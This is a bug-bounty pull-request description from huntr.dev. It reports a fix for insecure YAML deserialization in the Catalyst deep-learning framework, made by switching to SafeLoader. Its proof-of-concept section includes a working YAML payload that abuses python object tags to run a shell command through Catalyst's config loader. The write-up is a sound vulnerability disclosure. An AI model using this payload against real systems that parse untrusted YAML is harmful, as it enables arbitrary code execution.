Security Fix for Insecure Deserialization - huntr.dev

[huntr-helper]

https://huntr.dev/users/arjunshibu has fixed the Insecure Deserialization vulnerability 🔨. Think you could fix a vulnerability like this?

Get involved at https://huntr.dev/

Q | A
Version Affected | ALL
Bug Fix | YES
Original Pull Request | 418sec#1
Vulnerability README | https://github.com/418sec/huntr/blob/master/bounties/pip/catalyst/1/README.md

User Comments:

📊 Metadata *

Bounty URL: https://www.huntr.dev/bounties/1-pip-catalyst

⚙️ Description *

Catalyst is a PyTorch framework for Deep Learning research and development. It focuses on reproducibility, rapid experimentation, and codebase reuse so you can create something new rather than write another regular train loop.
This package was vulnerable to Arbitrary code execution via Insecure YAML deserialization due to the use of a known vulnerable function load() in yaml.

repo: https://github.com/catalyst-team/catalyst

💻 Technical Description *

Fix implemented by using yaml.SafeLoader instead of default vulnerable Loader.

🐛 Proof of Concept (PoC) *

import os
os.system('pip3 install catalyst')
from catalyst.utils import config
exploit = """!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('xcalc')"
"""
open('pwn.yml','w+').write(exploit)
config.load_config('pwn.yml')

pip3 install catalyst
python3 exploit.py

🔥 Proof of Fix (PoF) *

+1 User Acceptance Testing (UAT)

• I've executed unit tests.
• After fix the functionality is unaffected.